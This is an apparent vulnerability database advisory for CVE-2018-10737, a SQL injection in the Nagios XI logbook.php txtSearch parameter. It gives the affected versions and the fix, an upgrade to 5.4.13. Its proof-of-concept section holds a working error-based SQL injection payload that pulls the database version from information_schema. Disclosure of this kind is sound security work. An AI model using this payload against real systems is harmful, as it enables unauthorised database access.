NagiosXI <= 5.4.12 logbook.php... CVE-2018-10737 CNNVD-201805-492

6.5 AV AC AU C I A
发布: 2018-05-16
修订: 2018-06-15

### NagiosXI <= 5.4.12 logbook.php SQL injection(CVE-2018-10737) #### Description A SQL injection issue was discovered in Nagios XI via the admin/logbook.php txtSearch parameter. #### Affected Version * Nagios XI 5.2.x * Nagios XI 5.4.x before 5.4.13 #### Proof of concept ``` http://xxxx/nagiosql/admin/logbook.php postdata: txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# ``` ![](https://images.seebug.org/1525858933615-w331s) #### Fix Upgrade to version 5.4.13

0%
暂无可用Exp或PoC
当前有2条受影响产品信息